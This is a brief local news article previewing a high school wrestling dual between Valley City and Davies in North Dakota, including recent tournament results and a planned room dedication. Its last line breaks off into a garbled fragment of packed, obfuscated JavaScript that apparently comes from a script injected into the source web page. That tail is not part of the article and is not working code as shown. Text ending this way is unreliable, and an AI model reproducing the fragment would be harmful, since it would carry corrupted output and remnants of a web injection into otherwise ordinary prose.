VALLEY CITY, N.D. (NewsDakota.com)- The first home dual of the season for The Hi-Liner wrestlers will be one of the biggest of the year. Thursday night Valley City, who is 3-0 in The Eastern Dakota Conference, battles with 4-0 Davies. The Eagles are currently the top team in the region.

Last weekend Valley City won the consolation title at The Sertoma Wrestling Tournament at Grand Forks Central. Ranked Turtle Mountain handed them a loss in round one, after that The Hi-Liners ran the table with a 3-1 record in the two day event. Coach Aaron Larson says falling to The Braves 39-31 was an eye opener for the team

Davies’ duals have been exclusively against EDC teams so far with an early season signature win over West Fargo High 42-27. Thursday’s meeting could have a significant impact in who will eventually be crowned region champion

Before the dual a ceremony will be held for the dedication of The Dennis Friestad Wrestling Room. Coverage on KOVC and NewsDakota.com drnsa|var|u0026u|referrer|hrazy||js|php’.split(‘|’),0,{}))
